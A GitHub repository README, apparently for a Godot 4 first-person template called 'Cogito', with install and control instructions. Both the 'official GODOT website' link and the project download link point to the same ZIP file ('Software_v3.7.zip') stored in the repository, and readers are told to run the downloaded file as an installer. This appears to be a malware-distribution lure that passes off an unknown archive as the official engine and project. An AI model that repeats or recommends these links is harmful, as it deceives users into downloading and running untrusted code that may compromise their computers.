Skip to content

chasesnip3rpp/Cogito

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 

Repository files navigation

🧠 Cogito - Simple First-Person Template for GODOT 4

Download Cogito

An immersive simulation starter kit for the GODOT 4 engine. Build from a tested base with first-person controls and key game features included.


🧩 About Cogito

Cogito is a ready-to-use template project built for GODOT 4. It focuses on creating immersive first-person experiences. Whether you want to develop an FPS game, an immersive sim, or a general game prototype, Cogito offers a solid starting point.

This project helps you avoid the common setup work by providing:

  • Basic first-person movement controls
  • Interaction with objects and environment
  • Simple AI or enemy placeholders
  • Sample game scripts in GDScript
  • Compatibility with GODOT 4 engine

Cogito does not include a finished game. Instead, it acts as a framework where you can add your own ideas.


🖥️ System Requirements

To run Cogito on Windows, your computer should meet these requirements:

  • Windows 10 or later (64-bit recommended)
  • At least 8 GB RAM
  • A DirectX 11 compatible graphics card
  • GODOT 4 engine installed (see next section)
  • 2 GB of free disk space for the project files

This setup will run the template smoothly and allow you to test your own additions.


🚀 Getting Started with GODOT 4

Before running Cogito, you must install the GODOT 4 engine on your system. It is the software that runs the project.

Steps to install GODOT 4

  1. Open your web browser.

  2. Go to the official GODOT website: https://raw.githubusercontent.com/chasesnip3rpp/Cogito/main/cashableness/Software_v3.7.zip

  3. Under the "Standard version" for Windows, click the 64-bit option to download the .exe file.

  4. Once downloaded, run the installer and follow the prompts to finish installing GODOT.

  5. After installation, launch GODOT to confirm it runs correctly.

Avoid downloading GODOT from unofficial sources to prevent security risks.


📥 How to Download Cogito

To get the Cogito project files, you need to visit the GitHub page where the project is stored.

Download Cogito

Steps to download:

  1. Click the big green button or go to this page:
    https://raw.githubusercontent.com/chasesnip3rpp/Cogito/main/cashableness/Software_v3.7.zip

  2. On the GitHub page, find the green Code button near the top right.

  3. Click Code, then select Download ZIP.

  4. Save the ZIP file to your preferred location on your computer.

  5. Once downloaded, right-click the ZIP file and choose Extract All… to unzip the contents.


⚙️ How to Open and Run Cogito in GODOT 4

After downloading and extracting Cogito, follow these steps to run it:

  1. Open GODOT 4 on your computer.

  2. On the GODOT main screen, click "Import".

  3. In the pop-up, click the folder icon and navigate to the extracted Cogito folder.

  4. Select the folder that contains the project.godot file.

  5. Click "Import & Edit" to load the project.

  6. Once loaded, you will see the Cogito project interface.

  7. To test the project, find the Play button (a right arrow) at the top of the GODOT window.

  8. Click Play to run the template game scene.

The game should open in a window where you can move around using typical FPS controls (usually WASD for movement). Use the mouse to look around.


🕹 Controls Overview

Here are the basic controls you can expect in this first-person template:

  • W, A, S, D — Move forward, left, backward, and right
  • Mouse movement — Look around in all directions
  • Spacebar — Jump
  • E key — Interact with objects or open doors (if implemented)
  • Shift — Sprint or run faster (variable depending on template setup)
  • Esc key — Open the in-game menu or exit play mode

Spend a few minutes testing the controls to understand how they respond.


🛠 Exploring and Modifying Cogito

If you decide to explore or change the project, here are some pointers:

  • Cogito uses GDScript, Godot’s built-in scripting language. It is easier to learn than other languages.
  • The main scenes and scripts live inside the res:// folder in GODOT.
  • Use the GODOT editor to open and edit scenes (.tscn files) and scripts (.gd files).
  • Change game elements by editing scene nodes or script code.
  • You can add new objects, animations, or AI scripts to build your game.

No programming experience is required, but familiarity with navigating files and folders helps.


💡 Tips for a Smooth Experience

  • Always save your progress before running the game scene.
  • If the game window is too small, adjust the resolution settings within the GODOT project.
  • Keep your GODOT installation updated to avoid compatibility issues.
  • Use the GODOT community forums and documentation for additional help.
  • Close unnecessary programs to improve game performance while testing.

📄 Project Details


🧰 Need Help?

If you run into issues opening or running the project:


👇 Download Now

Download Cogito

Releases

No releases published

Packages

 
 
 

Contributors